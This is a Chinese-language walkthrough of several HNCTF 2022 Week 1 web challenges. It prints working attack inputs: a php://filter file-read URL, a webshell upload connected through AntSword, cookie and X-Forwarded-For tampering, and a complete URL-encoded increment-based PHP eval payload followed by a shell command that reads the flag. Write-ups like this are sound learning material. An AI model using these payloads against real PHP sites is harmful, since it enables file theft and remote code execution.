Week1
[HNCTF 2022 Week1]2048
f12查看源代码
可以看出游戏的分数是score
修改score的值
得到flag
[HNCTF 2022 Week1]Interesting_include
得到源码
<?php
//WEB手要懂得搜索
//flag in ./flag.php
if(isset($_GET['filter'])){
$file = $_GET['filter'];
if(!preg_match("/flag/i", $file)){
die("error");
}
include($file);
}else{
highlight_file(__FILE__);
}
php伪协议,构造payload:
http://node3.anna.nssctf.cn:28894/?filter=php://filter/read=convert.base64-encode/resource=flag.php
base64解码得到flag
[HNCTF 2022 Week1]easy_upload
不是,你个标签整这么吓人干嘛啊???是谁!!
一句话木马直接挂马成功了
蚁剑直接连接
根目录下得到flag
[HNCTF 2022 Week1]easy_html
说饼干中好像有什么东西,那就看cookie,url转码一下,./f14g.php
,然后去访问
说要输入手机号登录,本来想随便输入一个的,但是只能输入十位,并且会回显nononono!
利用burp抓包,强行输入11位数字,发包得到flag
[HNCTF 2022 Week1]What is Web
CTRL+U往下拉
base64解码得到flag
[HNCTF 2022 Week1]Interesting_http
说要post a want
,那就给他发一个want
给了两个单词,肯定选flag,然后发包
提示Not admin
,用burp抓包,可以看到cookie中有一个user
,值是notadmin
改成admin
提示No location
,用XFF
打
拿到flag
[HNCTF 2022 Week1]Challenge__rce
f12查看hint,?hint
给hint传入一个值得到源码
<?php
error_reporting(0);
if (isset($_GET['hint'])) {
highlight_file(__FILE__);
}
if (isset($_POST['rce'])) {
$rce = $_POST['rce'];
if (strlen($rce) <= 120) {
if (is_string($rce)) {
if (!preg_match("/[!@#%^&*:'\-<?>\"\/|`a-zA-Z~\\\\]/", $rce)) {
eval($rce);
} else {
echo("Are you hack me?");
}
} else {
echo "I want string!";
}
} else {
echo "too long!";
}
}
说明这里要进行RCE,但是过滤掉了大部分东西,这里可以用的是$()+,.0123456789;=[]_{}
,那么就是自增RCE
关于自增RCE可看这篇:CTFshow-RCE极限大挑战wp
直接放payload:
rce=$_=[]._;$__=$_[1];$_=$_[0];$_++;$_1=++$_;$_++;$_++;$_++;$_++;$_=$_1.++$_.$__;$_=_.$_(71).$_(69).$_(84);$$_[1]($$_[2]);
但是传入的时候要进行url编码
%24_%3D%5B%5D._%3B%24__%3D%24_%5B1%5D%3B%24_%3D%24_%5B0%5D%3B%24_%2B%2B%3B%24_1%3D%2B%2B%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D%24_1.%2B%2B%24_.%24__%3B%24_%3D_.%24_(71).%24_(69).%24_(84)%3B%24%24_%5B1%5D(%24%24_%5B2%5D)%3B
并且传入的时候要传入1
和2
,如下
然后将2
的值为cat /ffflllaaaggg
得到flag